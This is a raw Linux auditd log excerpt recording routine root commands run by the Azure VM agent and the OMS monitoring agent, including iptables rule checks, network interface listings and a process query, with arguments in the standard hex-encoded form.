+type=PATH msg=audit(1551487510.110:911): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487510.110:911): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487510.110:912): arch=c000003e syscall=59 success=yes exit=0 a0=5582dfc8e7e0 a1=5582dfc8e728 a2=5582dfc8e7b0 a3=7fa91a2aa810 items=2 ppid=19328 pid=19329 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487510.110:912): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487510.110:912): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487510.110:912): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487510.110:912): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487510.110:912): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487515.122:913): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd068e3eb0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19332 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487515.122:913): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487515.122:913): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487515.122:913): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487515.122:913): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487515.122:913): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487515.122:914): arch=c000003e syscall=59 success=yes exit=0 a0=5642f2dbebb8 a1=5642f2dbeb70 a2=5642f2dbeb88 a3=7f6ade18c810 items=2 ppid=19332 pid=19333 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487515.122:914): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487515.122:914): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487515.122:914): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487515.122:914): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487515.122:914): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487515.122:915): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd068e3eb0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19334 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487515.122:915): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487515.122:915): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487515.122:915): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487515.122:915): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487515.122:915): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487515.126:916): arch=c000003e syscall=59 success=yes exit=0 a0=5598176557e0 a1=559817655728 a2=5598176557b0 a3=7f7b4d730810 items=2 ppid=19334 pid=19335 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487515.126:916): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487515.126:916): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487515.126:916): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487515.126:916): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487515.126:916): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487520.134:917): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d970 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19338 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.134:917): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487520.134:917): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.134:917): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.134:917): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.134:917): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487520.134:918): arch=c000003e syscall=59 success=yes exit=0 a0=55c97a13cbb8 a1=55c97a13cb70 a2=55c97a13cb88 a3=7fb076888810 items=2 ppid=19338 pid=19339 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.134:918): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487520.134:918): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.134:918): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.134:918): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.134:918): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487520.138:919): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d970 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19340 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.138:919): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487520.138:919): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.138:919): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.138:919): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.138:919): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487520.138:920): arch=c000003e syscall=59 success=yes exit=0 a0=5562fbe6d7e0 a1=5562fbe6d728 a2=5562fbe6d7b0 a3=7fb7f9084810 items=2 ppid=19340 pid=19341 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.138:920): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487520.138:920): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.138:920): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.138:920): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.138:920): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487520.794:921): arch=c000003e syscall=59 success=yes exit=0 a0=7f6f48000d70 a1=7f6f480055b0 a2=7ffcf2b985e8 a3=55ebf54fa680 items=2 ppid=1707 pid=19342 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.794:921): argc=3 a0="/bin/sh" a1="-c" a2=746F70202D626E31207C2067726570202D69206F6D736167656E74207C2061776B20277B7072696E74202431202220222024322022202220243920222022202431302020222022202431327D27
+type=CWD msg=audit(1551487520.794:921): cwd="/var/lib/waagent/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux-1.9.1"
+type=PATH msg=audit(1551487520.794:921): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.794:921): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.794:921): proctitle=2F62696E2F7368002D6300746F70202D626E31207C2067726570202D69206F6D736167656E74207C2061776B20277B7072696E74202431202220222024322022202220243920222022202431302020222022202431327D27
+type=SYSCALL msg=audit(1551487520.798:922): arch=c000003e syscall=59 success=yes exit=0 a0=5636ece22610 a1=5636ece225c8 a2=5636ece225e0 a3=5636ece22010 items=2 ppid=19342 pid=19343 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="top" exe="/usr/bin/top" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.798:922): argc=2 a0="top" a1="-bn1"
+type=CWD msg=audit(1551487520.798:922): cwd="/var/lib/waagent/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux-1.9.1"
+type=PATH msg=audit(1551487520.798:922): item=0 name="/usr/bin/top" inode=4278 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.798:922): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.798:922): proctitle=746F70002D626E31
+type=SYSCALL msg=audit(1551487520.798:923): arch=c000003e syscall=59 success=yes exit=0 a0=5636ece22638 a1=5636ece225e8 a2=5636ece22608 a3=5636ece22010 items=2 ppid=19342 pid=19344 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="grep" exe="/bin/grep" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.798:923): argc=3 a0="grep" a1="-i" a2="omsagent"
+type=CWD msg=audit(1551487520.798:923): cwd="/var/lib/waagent/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux-1.9.1"
+type=PATH msg=audit(1551487520.798:923): item=0 name="/bin/grep" inode=51 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.798:923): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.798:923): proctitle=67726570002D69006F6D736167656E74
+type=SYSCALL msg=audit(1551487520.798:924): arch=c000003e syscall=59 success=yes exit=0 a0=5636ece22638 a1=5636ece225f0 a2=5636ece22608 a3=5636ece22010 items=2 ppid=19342 pid=19345 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="awk" exe="/usr/bin/gawk" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.798:924): argc=2 a0="awk" a1=7B7072696E74202431202220222024322022202220243920222022202431302020222022202431327D
+type=CWD msg=audit(1551487520.798:924): cwd="/var/lib/waagent/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux-1.9.1"
+type=PATH msg=audit(1551487520.798:924): item=0 name="/usr/bin/awk" inode=4461 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.798:924): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.798:924): proctitle=61776B007B7072696E74202431202220222024322022202220243920222022202431302020222022202431327D
+type=SYSCALL msg=audit(1551487520.958:925): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662dcf0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19346 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.958:925): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487520.958:925): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.958:925): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.958:925): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.958:925): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487520.958:926): arch=c000003e syscall=59 success=yes exit=0 a0=55da0a2a7bb8 a1=55da0a2a7b70 a2=55da0a2a7b88 a3=7fe3a954d810 items=2 ppid=19346 pid=19347 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.958:926): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487520.958:926): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.958:926): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.958:926): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.958:926): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487520.962:927): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac08 a1=7fdd0662dcf0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19348 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.962:927): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D4C204F5554505554202D2D7A65726F204F5554505554202D6E7876
+type=CWD msg=audit(1551487520.962:927): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.962:927): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.962:927): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.962:927): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D4C204F5554505554202D2D7A65726F204F5554505554202D6E7876
+type=SYSCALL msg=audit(1551487520.962:928): arch=c000003e syscall=59 success=yes exit=0 a0=55beb229e578 a1=55beb229e4f8 a2=55beb229e548 a3=7f4da0224810 items=2 ppid=19348 pid=19349 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.962:928): argc=9 a0="iptables" a1="-w" a2="-t" a3="security" a4="-L" a5="OUTPUT" a6="--zero" a7="OUTPUT" a8="-nxv"
+type=CWD msg=audit(1551487520.962:928): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.962:928): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.962:928): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.962:928): proctitle=69707461626C6573002D77002D74007365637572697479002D4C004F5554505554002D2D7A65726F004F5554505554002D6E7876
+type=NETFILTER_CFG msg=audit(1551487520.966:929): table=security family=2 entries=6
+type=SYSCALL msg=audit(1551487520.966:929): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=559b39964fe0 items=0 ppid=19348 pid=19349 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=PROCTITLE msg=audit(1551487520.966:929): proctitle=69707461626C6573002D77002D74007365637572697479002D4C004F5554505554002D2D7A65726F004F5554505554002D6E7876
+type=SYSCALL msg=audit(1551487520.998:930): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662dd10 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19350 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.998:930): argc=3 a0="/bin/sh" a1="-c" a2=6970202D61202D6F206C696E6B
+type=CWD msg=audit(1551487520.998:930): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.998:930): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.998:930): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.998:930): proctitle=2F62696E2F7368002D63006970202D61202D6F206C696E6B
+type=SYSCALL msg=audit(1551487520.998:931): arch=c000003e syscall=59 success=yes exit=0 a0=55e32e9b2c28 a1=55e32e9b2bd0 a2=55e32e9b2bf8 a3=7f4a94a32810 items=2 ppid=19350 pid=19351 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="ip" exe="/bin/ip" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487520.998:931): argc=4 a0="ip" a1="-a" a2="-o" a3="link"
+type=CWD msg=audit(1551487520.998:931): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487520.998:931): item=0 name="/sbin/ip" inode=115 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487520.998:931): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487520.998:931): proctitle=6970002D61002D6F006C696E6B
+type=SYSCALL msg=audit(1551487521.002:932): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662dd10 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19352 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487521.002:932): argc=3 a0="/bin/sh" a1="-c" a2=6970202D34202D61202D6F2061646472657373
+type=CWD msg=audit(1551487521.002:932): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487521.002:932): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487521.002:932): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487521.002:932): proctitle=2F62696E2F7368002D63006970202D34202D61202D6F2061646472657373
+type=SYSCALL msg=audit(1551487521.002:933): arch=c000003e syscall=59 success=yes exit=0 a0=55610684dc70 a1=55610684dc10 a2=55610684dc40 a3=7f48aa618810 items=2 ppid=19352 pid=19353 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="ip" exe="/bin/ip" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487521.002:933): argc=5 a0="ip" a1="-4" a2="-a" a3="-o" a4="address"
+type=CWD msg=audit(1551487521.002:933): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487521.002:933): item=0 name="/sbin/ip" inode=115 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487521.002:933): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
